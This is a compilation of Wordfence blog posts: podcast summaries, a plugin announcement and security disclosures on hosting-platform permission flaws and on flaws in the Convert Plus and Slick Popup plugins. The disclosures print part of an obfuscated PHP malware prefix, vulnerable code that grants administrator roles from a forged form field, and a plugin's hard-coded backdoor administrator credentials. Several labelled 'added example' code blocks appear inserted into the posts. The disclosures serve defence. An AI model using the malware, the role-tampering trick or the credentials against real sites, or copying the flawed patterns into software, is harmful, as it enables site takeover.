Podcast Episode 21: New Plugin Vulns Exploited in the Wild, an Extortion Scam and the CBP Data Breach

This week, we discuss active exploitation of a plugin vulnerability in the wild, an extortion scam hitting numerous website owners, exposure of Industrial Control Systems to attackers as well as a CBP breach affecting travelers in the United States. We also talk about an email server vulnerability and what to do in a SIM port attack.

Here are approximate timestamps in case you want to jump around:
0:35 User Submitted Posts Plugin Vulnerability Seeing Attacks
4:20 An extortion scam is threatening website owners & how to protect your site
10:10 CBP breach of license plates and facial recognition data affecting US travelers
16:54 WordPress accessibility proposal
25:25 Google Cloud outage affects numerous services
26:59 State of Industrial Control Systems in Poland and Switzerland
36:00 Severe RCE in Exim mail transfer agent
37:09 What to do when SIM swapping happens to you

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. Please feel free to post your feedback in the comments below.

The post Podcast Episode 21: New Plugin Vulns Exploited in the Wild, an Extortion Scam and the CBP Data Breach appeared first on Wordfence.

Podcast Episode 20: Making Big Changes by Adopting Micro-Habits with Nathan Ingram

At WordCamp Orange County, Nathan Ingram participated in a unique business track discussion about failure, something with which most entrepreneurs are intimately familiar. Immediately after his talk, Nathan sat down with Mark for this interview. The conversation goes deep fast, as both Mark and Nathan share their thoughts about being an entrepreneur and how “the best lessons in life are learned from failure.” Nathan recently lost 50 pounds in two months and he talks about the micro-habits that he leveraged to make big successful changes with his health. This unique, honest and heartfelt interview has a number of lessons for those of us looking to optimize our business processes and find better balance in life.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Nathan on Twitter @nathaningram or at NathanIngram.com where you can also learn more about Nathan’s incredible health journey. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 20: Making Big Changes by Adopting Micro-Habits with Nathan Ingram appeared first on Wordfence.

Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies

In episode 19 we talk to Brad Haas about recently patched service vulnerabilities that impacted four popular hosting companies. We also talk about a new login security plugin for WordPress that we’ve launched. In the news we cover a wave of SIM swapping attacks hitting cryptocurrency users, NGINX vulnerabilities and recent data breaches affecting the personal information of millions of people.

Here are approximate timestamps in case you want to jump around:
0:40 Interview with Brad Haas on service vulnerability impacting four popular hosting companies
15:31 New Wordfence Login Security plugin
27:54 SIM port attacks hit cryptocurrency users
35:23 100,000 Australians' private details exposed by Westpac PayID
39:44 Billing details for 11.9 million Quest Diagnostics customers exposed
43:47 NGINX RCE Vulnerabilities

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Brad at @realbradhaas. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies appeared first on Wordfence.

Service Vulnerability: Four Popular Hosting Companies Fix NFS Permissions and Information Disclosure Problems

Last year, we published two disclosures of service vulnerabilities on hosting platforms. The first one included a trio of brands: Hostway, Momentous, and Paragon Group. The second was for MelbourneIT. In all cases, we were happy to report that the affected companies took our disclosures seriously and moved quickly to fix the problems.

Today we’re announcing a similar disclosure for several brands owned by Endurance International Group, including iPage, FatCow, PowWeb, and NetFirms. A pair of vulnerabilities on these platforms allowed attackers to tamper with customers’ databases directly, without actually accessing their websites. Following our Vulnerability Disclosure Policy, we privately disclosed these problems to the Endurance team. Their response was immediate and exemplary: they communicated with us in order to understand the problems, activated their incident response team to conduct triage, implemented hotfixes within days, and implemented full fixes soon after. Their actions showed solid commitment to their customers’ security.

Attacks and Investigation

Our Security Services Team noticed a recent trend in customers whose sites were hosted on the affected platforms. An administrator account suddenly appeared in the sites, and attackers logged into that account and added malware to the sites using the WordPress theme editor. The account had the same unusual username (“badminton”) in each case. The malware was obfuscated, but performed the same function on each affected site, hijacking site traffic from search engines and redirecting visitors to spam sites.

The platforms do make site access logs available to site owners, but the logs didn’t show any unusual activity on the days of the attacks. We found no malware other than what the attackers added in the theme files, no vulnerable themes or plugins, and generally nothing in common across all the affected sites except that they were on the same set of hosting services.

As in the service vulnerabilities we published last year, it appeared that the attackers had a way to steal database credentials for our customers’ sites, and then interact with the database directly in order to create their rogue administrator accounts. We started to investigate whether that would be possible on the platforms in question, and eventually we discovered two vulnerabilities which allowed it to happen.

The balance of this article is most appropriate for a technical audience. If you are a less technical reader you may want to skip down to the “What You Need To Do” section below.

File and Directory Information Exposure Vulnerability

After compromising a site, it is common for attackers to explore filesystems on the server in order to search for other vulnerabilities. On the affected servers, we discovered that the /opt/users directory contained subdirectories revealing the names of the user accounts for every website on the platform.

For example, a website “example.com” on FatCow might run under the username moo.examplecom. There would be a corresponding directory for it at /opt/users/moo/e/x/moo.examplecom. Permissions on the /opt directory were lax enough that all the subdirectories could be listed by any user. So with a bit of scripting, it was possible to harvest the usernames for every website using FatCow shared hosting (and likewise the other affected brands). After our disclosure, permissions were fixed on /opt/users so that the contents can no longer be listed.

Insufficient Permissions Vulnerability

Four conditions existed that contributed to this vulnerability:

  1. Customer files are all stored on a shared file system.
  2. The full path to a user’s web root directory was public or could be guessed.
  3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).
  4. An attacker could cause a program running in the group www to read files in arbitrary locations.

On the affected hosting platforms, all users’ files reside under a shared file system mounted at the directory /hermes. This satisfies the first condition of the Insufficient Permissions vulnerability.

The names of subdirectories in the full path to a site root directory follow a pattern. The full path for our fictional site example.com might be: /hermes/walnaweb15a/b1234/moo.examplecom/.

Ownership and permissions on the file system follow a specific structure for each of the directories in the full path:

/hermes – root:root 0755 – since it is world-readable, its contents can be listed

/hermes/walnaweb15a – root:root 0711 – contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234 – root:root 0711 – contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234/moo.examplecom – moo.examplecom:www 0750 – contents can be listed by the owner or by any user belonging to the group “www”

The contents of directories like /hermes/walnaweb15a appear to follow a simple pattern – the letter “b” followed by one or more digits. Attackers would have noticed this by viewing the working directory of compromised sites, or even by searching Google for “/hermes/walnaweb” or similar directory names to view accidental full path disclosures. A script can easily find every subdirectory by checking for the existence of /hermes/walnaweb15a/b1, /hermes/walnaweb15a/b2, etc.

It is trickier but still possible to find the contents of the b* directories – this is where the File and Directory Information Exposure vulnerability would be used. Attackers could use scripting to iterate over each username and check for its existence in each b* directory. It’s inefficient, but the attacker could gradually build a large list of full paths to site root directories, satisfying the second condition of the Insufficient Permissions vulnerability.

As outlined above, the default permissions on directories and files on the affected platforms ensure that a program running in the group www can traverse into any user’s directory and read files in it, satisfying the third condition.

PHP scripts in any given user’s site run as that user and as the group cgiuser. As such, they don’t have permission to access other users’ files. However, the File Manager in the hosting control panel runs in the group www. Its operations seem to be restricted to a user’s own site root directory, but it can be manipulated to copy files from any location in the entire file system. So if an attacker crafts requests that point it to other users’ sensitive files, it will have sufficient privileges to copy those files into a directory under the attacker’s control.
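The third condition above (every directory on the path traversable, the file itself readable, by a process in group www) can be checked mechanically. The following is an added example, not Wordfence's or the hosting platform's code; the modes and groups are constructed from the listing above, and the group on wp-config.php is an assumption.

```php
<?php
// Added example (not Wordfence's or the hosting platform's code). It evaluates the
// third condition from the article: can a process running as some other user, in
// group $group ("www" here), traverse every directory on the path to a file and
// then read it? Modes and groups below are constructed from the article's listing;
// the group on wp-config.php itself is an assumption.

const X_GRP = 0010;  // group execute (traverse) bit
const X_OTH = 0001;  // other execute (traverse) bit
const R_GRP = 0040;  // group read bit
const R_OTH = 0004;  // other read bit

// "/a/b/c.php" -> ["/a", "/a/b"]: every directory that must be traversed.
function ancestors(string $file): array {
    $parts = explode('/', trim($file, '/'));
    array_pop($parts);                       // drop the file name
    $acc = '';
    $out = [];
    foreach ($parts as $p) {
        $acc .= '/' . $p;
        $out[] = $acc;
    }
    return $out;
}

// $entries: absolute path => ['group' => name, 'mode' => permission bits].
// Returns ['exposed' => bool, 'reasons' => string[]].
function check_path_exposure(array $entries, string $file, string $group = 'www'): array {
    $reasons = [];
    $traversable = true;
    foreach (ancestors($file) as $dir) {
        if (!isset($entries[$dir])) {
            $reasons[] = "$dir: no permission data";
            $traversable = false;
            continue;
        }
        $e = $entries[$dir];
        $ok = ($e['mode'] & X_OTH) || (($e['mode'] & X_GRP) && $e['group'] === $group);
        if (!$ok) {
            $traversable = false;
            $reasons[] = sprintf('%s (%s %04o) blocks group %s', $dir, $e['group'], $e['mode'], $group);
        }
    }
    $readable = false;
    if (isset($entries[$file])) {
        $e = $entries[$file];
        $readable = ($e['mode'] & R_OTH) || (($e['mode'] & R_GRP) && $e['group'] === $group);
        if (!$readable) {
            $reasons[] = sprintf('%s (%s %04o) is not readable by group %s', $file, $e['group'], $e['mode'], $group);
        }
    } else {
        $reasons[] = "$file: no permission data";
    }
    return ['exposed' => $traversable && $readable, 'reasons' => $reasons];
}

// Build the same structure from a live file system. The posix extension is used
// to resolve group names when available; otherwise the numeric gid is kept.
function live_entries(string $file): array {
    $entries = [];
    foreach (array_merge(ancestors($file), [$file]) as $path) {
        if (!file_exists($path)) {
            continue;
        }
        $gid  = filegroup($path);
        $info = function_exists('posix_getgrgid') ? posix_getgrgid($gid) : false;
        $grp  = is_array($info) ? $info['name'] : (string) $gid;
        $entries[$path] = ['group' => $grp, 'mode' => fileperms($path) & 0777];
    }
    return $entries;
}

// Constructed from the article's listing for the fictional site example.com.
$site = '/hermes/walnaweb15a/b1234/moo.examplecom';
$entries = [
    '/hermes'                   => ['group' => 'root', 'mode' => 0755],
    '/hermes/walnaweb15a'       => ['group' => 'root', 'mode' => 0711],
    '/hermes/walnaweb15a/b1234' => ['group' => 'root', 'mode' => 0711],
    $site                       => ['group' => 'www',  'mode' => 0750],
    "$site/wp-config.php"       => ['group' => 'www',  'mode' => 0644], // group assumed
];

// Compare the default mode with the 0600 workaround mentioned in the article.
foreach ([0644, 0600] as $mode) {
    $entries["$site/wp-config.php"]['mode'] = $mode;
    $r = check_path_exposure($entries, "$site/wp-config.php");
    printf("wp-config.php at %04o: %s\n", $mode, $r['exposed'] ? 'EXPOSED to group www' : 'not exposed');
    foreach ($r['reasons'] as $reason) {
        echo "  - $reason\n";
    }
}
```

On a live site, `check_path_exposure(live_entries($path), $path)` runs the same test against the real directory chain of your own wp-config.php.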

After our disclosure, the flaws in the File Manager were patched, and the platform administrators made architectural adjustments to address the permissions problems at a deeper level.

Remediation

Before the vulnerabilities were fixed, the only workaround for site owners was to set permissions on any sensitive file to 0600. This was not ideal, as there are a number of ways the permissions could be reset as a side effect of scripts running on the website or server. Thankfully, the Endurance team worked very quickly to fix the problems. Our disclosure was on May 7. They replied after hours acknowledging the report, and worked with us during the following two weeks. Their hotfixes were in place by May 10, and permanent fixes finished by May 15.

What You Need To Do

If you use shared hosting on any of the brands we mentioned, use Wordfence to check your site for issues. If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dd\x70\x68z\x67\x64gx"]="sl\x77k\x77i";${"\x47\x4cO\x42\x41L\x53"}["c\x7a\x66\x6dubkdo\x6a\x78"]="\x6c\x6f\x63\x61t\x69\x6fn";${"\x47\x4c\x4fB\x41LS"}["\x67\x64\x64e\x74\x62p\x75f\x65i"]="\x68t\x6d\x6c";${"\x47\x4cOB\x41\x4cS"}["\x77i\x64\x68\x6bv\x6da"]="\x73t\x72\x66";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66s\x75\x71\x79\x6evw"]="b\x6f\x74";${"\x47\x4cOBAL\x53"}["w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75"]="cac\x68\x65";${"G\x4cO\x42\x41L\x53"}["ry\x68\x72ku\x6b"]="\x73\x63h\x65\x6d\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x6a\x6bc\x64e\x65\x69w"]="\x73l\x77k\x77i\x32";${"G\x4cOBA\x4cS"}["\x79\x65\x64\x73\x67\x6ah\x69\x73\x67"]="\x73\x6c\x74l\x65\x69l\x73";
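To find this kind of injected prefix in theme files, the following added example (not Wordfence's scanner) decodes the \xNN escapes, recovers the hidden string literals, and flags PHP files whose first bytes show the same idiom. The sample input is a constructed fragment in the same style, not the malware itself.

```php
<?php
// Added example (not Wordfence's scanner). It decodes the "\xNN" escapes used in
// the injected header.php prefix above, recovers the hidden string literals, and
// flags PHP files whose first bytes show the same idiom. The sample input is a
// constructed fragment in the same style, not the malware itself.

// Replace PHP hex escapes inside string literals with the bytes they encode.
function decode_hex_escapes(string $php): string {
    return preg_replace_callback('/\\\\x([0-9A-Fa-f]{2})/', function (array $m): string {
        return chr(hexdec($m[1]));
    }, $php);
}

// Report on one chunk of source: escape count, whether the ${"GLOBALS"}[...]
// variable-variable idiom appears once decoded, and the recovered literals.
function obfuscation_report(string $source, int $min_escapes = 8): array {
    $escapes = preg_match_all('/\\\\x[0-9A-Fa-f]{2}/', $source);
    $decoded = decode_hex_escapes($source);
    $globals = preg_match_all('/\$\{"GLOBALS"\}\[/', $decoded);
    preg_match_all('/"([^"\\\\]*)"/', $decoded, $m);
    return [
        'hex_escapes'   => $escapes,
        'globals_idiom' => $globals,
        'literals'      => array_values(array_unique($m[1])),
        'suspicious'    => $escapes >= $min_escapes && $globals > 0,
        'decoded'       => $decoded,
    ];
}

// Check only the head of each PHP file under $dir (e.g. wp-content/themes), since
// the injection described in the article sits at the top of header.php.
function scan_theme_files(string $dir, int $head_bytes = 4096): array {
    $hits = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $info) {
        if ($info->getExtension() !== 'php') {
            continue;
        }
        $head   = (string) file_get_contents($info->getPathname(), false, null, 0, $head_bytes);
        $report = obfuscation_report($head);
        if ($report['suspicious']) {
            $hits[$info->getPathname()] = $report;
        }
    }
    return $hits;
}

// Constructed sample in the same style as the injected prefix (single-quoted so
// the backslashes stay literal, exactly as they would appear in the file).
$sample = '<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["a\x62c"]="\x73\x74\x72";';
$r = obfuscation_report($sample);
echo $r['decoded'], "\n";
printf("escapes=%d globals=%d suspicious=%s\n",
    $r['hex_escapes'], $r['globals_idiom'], $r['suspicious'] ? 'yes' : 'no');
echo 'literals: ', implode(', ', $r['literals']), "\n";
```

`scan_theme_files(WP_CONTENT_DIR . '/themes')` applies the same report to every theme file and returns only the suspicious ones.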

You should also check your list of user accounts and look for any rogue administrators. If your site has any of these issues, we recommend using our site cleaning service to fix them.

Conclusion

With the popularity of WordPress today, the security of the WordPress community at large is critically important. We are pleased to see that our approach to handling service vulnerabilities is working to support that need, and bringing about an improved overall security posture for the community.

Our Security Services Team continues to analyze hundreds of hacked websites each month, so we expect to find more of these in the future. We will continue to provide updates here on the blog.

Finally, a huge thank you to Matt Barry and Sean Murphy from our team for helping with the vulnerability research.

The post Service Vulnerability: Four Popular Hosting Companies Fix NFS Permissions and Information Disclosure Problems appeared first on Wordfence.

Introducing the Wordfence Login Security Plugin

Today we are excited to announce the release of a brand new plugin: Wordfence Login Security. This plugin is a completely standalone plugin and you don’t need to install the full version of Wordfence to take advantage of the specific security features included in it.

Wordfence Login Security is designed by our team to secure your login and authentication system. It’s worth noting that this plugin does not include the firewall, malware scanner and other features that the full Wordfence plugin comes with.

If you already have an alternative firewall solution in place and are covered for malware scanning, then this plugin is perfect for you because it secures your login system against several dangerous and targeted attacks.

Wordfence Login Security includes the following features:

  • It provides robust two-factor authentication that is not vulnerable to cellphone SIM porting attacks.
  • It includes a login page CAPTCHA that protects you from sophisticated credential stuffing attacks that use a wide range of IP addresses.
  • It also includes XML-RPC protection.

These features are also included in the full Wordfence plugin. So if you are using Wordfence already, you don’t need to install this new plugin. You can learn more about how these features are available in Wordfence by checking out last week’s announcement post.

Why did we do this?

Over the last year we have spent a lot of time talking to WordPress users. One thing we learned, from larger companies especially, is that everyone’s situation is different. And that even means (gasp!) that some people can’t or don’t run Wordfence on some of their sites. The reasons vary, but in most cases there are many features they could benefit from using.

With that in mind, when we decided to completely rewrite our two-factor authentication feature we decided to also release it as a separate plugin. Our hope is that by making sets of related features available in “modular” plugins like this, that more websites will benefit from Wordfence protection. Our goal, after all, is to make the web safer. The more sites we can keep safe the better.

Do I need both plugins?

In a word, no. Wordfence Login Security and the full Wordfence plugin share the same code for these features. If you already have the full Wordfence plugin installed you already have all of the features available in Wordfence Login Security. If you try to install Wordfence Login Security, nothing will change.

Can I install the full Wordfence plugin if I have Wordfence Login Security installed?

Wordfence Login Security and Wordfence are built to play nicely together. They integrate seamlessly. If you are using Wordfence Login Security and then install the full version of Wordfence, all of your settings are preserved.

Once you install the full version of Wordfence, a new ‘Wordfence’ section will be added to your menu. The settings for Wordfence Login Security will appear in this area as one of the security features available to you.

Again, all your settings are preserved and you can continue knowing your site has the additional features that Wordfence includes like our firewall and malware scanner.

Do I need to upgrade to Premium to use Wordfence Login Security?

This plugin is free and you do not need to pay to use it. In addition, the features that are included in Wordfence Login Security are also available in the free version of the full Wordfence plugin.

The Wordfence team is committed to making the Web a safer place. We wanted to make these essential security features available to absolutely every WordPress site owner and user at no cost. We also built the plugin to be as widely compatible as possible so that there is no barrier to entry when it comes to securing your website against credential stuffing attacks and other attacks targeting your login system.

What’s next for Wordfence Login Security?

Our team spent the past year developing and testing Wordfence Login Security. Our team has taken the plugin through a rigorous QA process that ensures it is widely compatible, rock solid and ready for production. We have also performed a comprehensive security audit on it to ensure that there are no loopholes or issues that an attacker can exploit.

At this point, Wordfence Login Security is an extremely stable and robust security solution for your WordPress authentication system. Our intention is to set the standard for WordPress two-factor authentication with this product.

Our next steps are to listen to the community feedback while providing excellent support for our customers. This will help guide the product direction and our development team.

If you are not currently using the full version of Wordfence, we hope you will at the very least install Wordfence Login Security to protect your WordPress authentication system. Our team is installing this plugin on their own sites – in fact many have been running the beta version for months.

Wordfence Login Security is a huge step forward in helping secure WordPress and we hope you will help spread the word in the community that this plugin is available, completely free, and does an excellent job of improving the security posture of a WordPress website.

Regards,

Mark Maunder
Wordfence/Defiant Founder and CEO

The post Introducing the Wordfence Login Security Plugin appeared first on Wordfence.

Episode 18: Scaling a WordPress Agency with Entrepreneur Verious Smith

At WordCamp Orange County, Mark interviewed Verious Smith from Philoveracity Design, a digital agency in southern California. Verious has also been the lead organizer of WordCamp Riverside and runs WordPress meetups to give back to the community. Mark and Verious talk about the challenges of entrepreneurship, growing from freelancer to an agency, and trust and interdependence in remote work. Verious is always striving to learn new things to optimize performance and improve workflow. We hope you enjoy the interview and get as much inspiration from Verious as we did.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Verious on Twitter @verioussmith or at Philoveracity Design.

The post Episode 18: Scaling a WordPress Agency with Entrepreneur Verious Smith appeared first on Wordfence.

Podcast Episode 17: 3 Severe WordPress Plugin Vulnerabilities

Mikey Veenstra joins us to talk about three WordPress plugins with severe vulnerabilities affecting well over 150,000 WordPress installations. Two plugins have been patched, one has not. With Mark under deadline for a film project, Mikey also talks some security news with Kathy. We cover a Docker vulnerability, anatomy of a SIM port attack, zero-day Windows exploits released by a disgruntled security researcher, two large scale data leaks affecting millions of people, and revisit the Baltimore ransomware problem and how the NSA’s Eternal Blue tool was used in the attack.

Here are approximate timestamps in case you want to jump around:
1:00 Interview with Mikey Veenstra on 3 severe WordPress plugin vulnerabilities
13:00 The news, and where’s Mark?
13:30 Docker vulnerability not yet patched
16:24 Anatomy of a SIM port attack
20:17 Microsoft zero-day exploits on Github
25:34 XSS vulnerability discovered in Slimstat plugin
26:26 Over 49 million Instagram users data exposed
29:28 First American Financial leaked hundreds of millions title insurance records
34:20 How an NSA malware tool was used in the Baltimore ransomware attack

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Mikey at @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 17: 3 Severe WordPress Plugin Vulnerabilities appeared first on Wordfence.

Critical Vulnerability Patched in Popular Convert Plus Plugin

Description: Unauthenticated Administrator Creation
CVSS v3.0 Score: 10.0 (Critical)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Plugin: Convert Plus
Plugin Slug: convertplug
Affected Versions: <= 3.4.2
Patched Version: 3.4.3

On Friday May 24th, our Threat Intelligence team identified a vulnerability present in Convert Plus, a commercial WordPress plugin with an estimated 100,000 active installs. This flaw allowed unauthenticated attackers to register new accounts with arbitrary user roles, up to and including Administrator accounts. We disclosed this issue privately to the plugin’s development team, who released a patch just a few days later.

Convert Plus (formerly convertplug) versions up to 3.4.2 are vulnerable to attacks against this flaw. All Convert Plus users should update to version 3.4.3 immediately, as this is a critical security issue. We have released a firewall rule to protect Wordfence Premium users who may not be able to update yet, but we still recommend installing the patch. Free users will receive the new rule after thirty days.

Vulnerability In Detail

Convert Plus is a lead generation plugin used to display marketing popups, info bars, and other elements to a site’s visitors with various calls-to-action like email subscription and coupon codes. When setting up a form for handling new subscribers, administrators can define a WordPress user role to be associated with the email address provided. By default this value is None and no user is created, but the site’s owner can have these forms create new Subscriber accounts, or any other role they’d like. The exception is the Administrator role: the plugin removes it from the list of available roles when generating the dropdown menu.

global $wp_roles;
$roles    = $wp_roles->get_names();
$user_arr = array();
foreach ( $roles as $rkey => $rvalue ) {
	$user_arr [ $rvalue ] = $rvalue;
}
$first_item = array( 'None' );
$new_arr    = $user_arr;
unset( $new_arr['Administrator'] );
$new_arr = $first_item + $new_arr;

However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user. Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.

// Add subscriber as new user role to site.
$new_role = isset( $_POST['cp_set_user'] ) ? $_POST['cp_set_user'] : 'None';

if ( 'success' === $status && ! $only_conversion ) {

	if ( '1' === $sub_optin || 1 === $sub_optin ) {
		$list_name  = str_replace( 'cp_connects_', '', $data_option );
		$list_name  = str_replace( '_', ' ', $list_name );
		$page_url   = isset( $cp_settings['cp-page-url'] ) ? $cp_settings['cp-email-body'] : '';
		$style_name = isset( $_POST['cp_module_name'] ) ? esc_attr( $_POST['cp_module_name'] ) : '';
		cp_notify_sub_to_admin( $list_name, $param, $sub_email, $email_sub, $email_body, $cp_page_url, $style_name );
	}
	if ( '' !== $new_role && ( 'None' !== $new_role && 'none' !== $new_role ) ) {
		cp_add_new_user_role( $param, $new_role );
	}
}

This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.

Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address. The new account is given a randomized password, but the attacker can issue a typical password reset to gain access to their rogue administrator account.
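The fix the flaw calls for is to stop reading the role from the request at all. The following is an added example, not Convert Plus's code: the vulnerable lookup beside a hardened one that resolves the role from the site's stored settings and validates it before cp_add_new_user_role() is called. cp_module_settings() and the option name it reads are assumptions about storage; the stored value is assumed to be a WordPress role slug.

```php
<?php
// Added example (not Convert Plus's code). It shows the vulnerable lookup beside a
// hardened one in which the role for a form comes from the site's stored settings,
// not from the request, and is validated before cp_add_new_user_role() is called.
// cp_module_settings() and the option name 'cp_module_<id>' are assumptions about
// how per-form settings might be stored; cp_add_new_user_role() is the plugin's
// own function named in the article.

// Vulnerable: trusts the hidden form field, so a visitor can submit
// cp_set_user=administrator and receive an Administrator account.
function cp_role_from_request_vulnerable(array $post): string {
    return isset($post['cp_set_user']) ? $post['cp_set_user'] : 'None';
}

// Hypothetical storage of the admin-chosen settings for one form/module.
function cp_module_settings(string $module_id): array {
    $opts = get_option('cp_module_' . sanitize_key($module_id), []);
    return is_array($opts) ? $opts : [];
}

// Hardened: resolve the role on the server and reject anything unexpected.
function cp_role_for_module(string $module_id): string {
    $settings = cp_module_settings($module_id);
    $role = isset($settings['cp_set_user']) ? (string) $settings['cp_set_user'] : 'None';

    if ('' === $role || 0 === strcasecmp($role, 'none')) {
        return 'None';
    }
    // The UI never offers Administrator, so a stored value of "administrator"
    // can only be the result of tampering; refuse it at the point of use too.
    if (0 === strcasecmp($role, 'administrator')) {
        return 'None';
    }
    // Only roles WordPress actually knows about may be assigned.
    return get_role($role) instanceof WP_Role ? $role : 'None';
}

// Submission handler sketch mirroring the article's flow. $param carries the
// subscriber details exactly as in the original code.
function cp_handle_subscription(array $post, string $status, bool $only_conversion, $param): void {
    if ('success' !== $status || $only_conversion) {
        return;
    }
    // cp_module_name is still client-supplied, but it only selects which
    // admin-configured form applies; the role itself is never read from $_POST.
    $module_id = isset($post['cp_module_name']) ? sanitize_key($post['cp_module_name']) : '';
    $new_role  = cp_role_for_module($module_id);
    if ('None' !== $new_role) {
        cp_add_new_user_role($param, $new_role);
    }
}
```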

Video Demonstration

Convert Plus Plugin Vulnerability Exploit Demonstration from Wordfence on Vimeo.

Disclosure Timeline

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.

Well-Handled Response

Vulnerability disclosures are an unfortunate necessity, and it’s important that they’re handled appropriately by all parties involved. In recent disclosures, we’ve seen a variety of responses from the developers we’ve reached out to. For example, in January we received no response at all from a disclosure regarding the Total Donations plugin. More recently was this week’s Slick Popup vulnerability, which had been acknowledged by the developers but remains unpatched.

Conversely, the response from Convert Plus’s team was an excellent example of how to handle a vulnerability disclosure. They responded quickly to our contact, and issued a patch for the flaw within just a few days. Once the patch went live, they published their own blog post alerting their users that an important update was available. They even highlighted the update on the plugin’s CodeCanyon page.

Convert Plus’s CodeCanyon page, featuring an alert regarding the security release.

Conclusion

In this post we shared details of a critical security flaw recently patched in the popular Convert Plus plugin for WordPress. This vulnerability has been patched as of version 3.4.3 of the plugin, and it’s crucial that all affected users patch as soon as possible. We have released a firewall rule which prevents exploits against Wordfence Premium users, which will be available to free users on June 27th.

As always, we will monitor our network for activity associated with this flaw and will update you with any noteworthy campaigns we identify.

The post Critical Vulnerability Patched in Popular Convert Plus Plugin appeared first on Wordfence.

Privilege Escalation Flaw Present In Slick Popup Plugin

In April, our Threat Intelligence team identified a privilege escalation flaw present in the latest version of Slick Popup, a WordPress plugin with approximately 7,000 active installs. We notified the developers, a firm called Om Ak Solutions, who acknowledged the issue and informed us that a patch would be released.

Per our disclosure policy, we allowed 30 days for resolution of this issue before releasing details to the public. Unfortunately, the deadline has passed without a satisfactory patch by the plugin’s developers. At this time, all versions of Slick Popup up to 1.7.1 are vulnerable.

In this post we’ll look at the vulnerability in question and what you should do if you’re making use of the plugin.

Subscriber+ Privilege Escalation Flaw In Support Access Feature

One feature of Slick Popup is the ability to grant support access to the plugin’s developers, Om Ak Solutions, with one click in the dashboard. This generates a new administrator account and sends an email to Om Ak Solutions with details. Two issues in this process combine to create the privilege escalation vulnerability in question.

// ADD NEW ADMIN USER TO WORDPRESS
// ----------------------------------
// Put this file in your WordPress root directory and run it from your browser.
// Delete it when you're done.
//require_once(ABSPATH . 'wp-blog-header.php');
//require_once(ABSPATH . 'wp-includes/registration.php');
// ----------------------------------------------------
// CONFIG VARIABLES
// Make sure that you set these before running the file.
$newusername = 'slickpopupteam';
$newpassword = 'OmakPass13#';
$newemail = 'poke@slickpopup.com';
// ----------------------------------------------------
// This is just a security precaution, to make sure the above "Config Variables" 
// have been changed from their default values.
if ( $newpassword != 'YOURPASSWORD' &&
	 $newemail != 'YOUREMAIL@TEST.com' &&
	 $newusername !='YOURUSERNAME' )
{
	// Check that user doesn't already exist
	if ( !username_exists($newusername) && !email_exists($newemail) )
	{
		// Create user and set role to administrator
		$user_id = wp_create_user( $newusername, $newpassword, $newemail);
		if ( is_int($user_id) )
		{
			$wp_user_object = new WP_User($user_id);
			$wp_user_object->set_role('administrator');

First, the credentials associated with this new administrative account are hard-coded into the plugin. When the user is created, it will have the username slickpopupteam and its password is OmakPass13#. Since this is a known value in all cases, it’s possible for malicious actors to assemble a list of sites making use of the plugin and occasionally test for the presence of this support user. Once logged in, they’re free to create other backdoors independent of this user.

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );
function action_splite_support_access() {
	$ajaxy = array();
	$errors = array();

	// No capability or nonce check precedes this point: any logged-in user reaches it.
	$todo = (isset($_POST['todo']) AND !empty($_POST['todo'])) ? $_POST['todo'] : 'createuser';

	// ... remainder of the handler (the user-creation logic shown above) omitted from the excerpt
}

However, attackers with at least Subscriber access to an affected site can create this user on their own. Since the AJAX action used to generate this user doesn’t contain any capabilities checks, it can be accessed by any logged-in user. This, combined with the hard-coded credentials in the plugin, means any user with an account can grant themselves administrative access and take over a site.
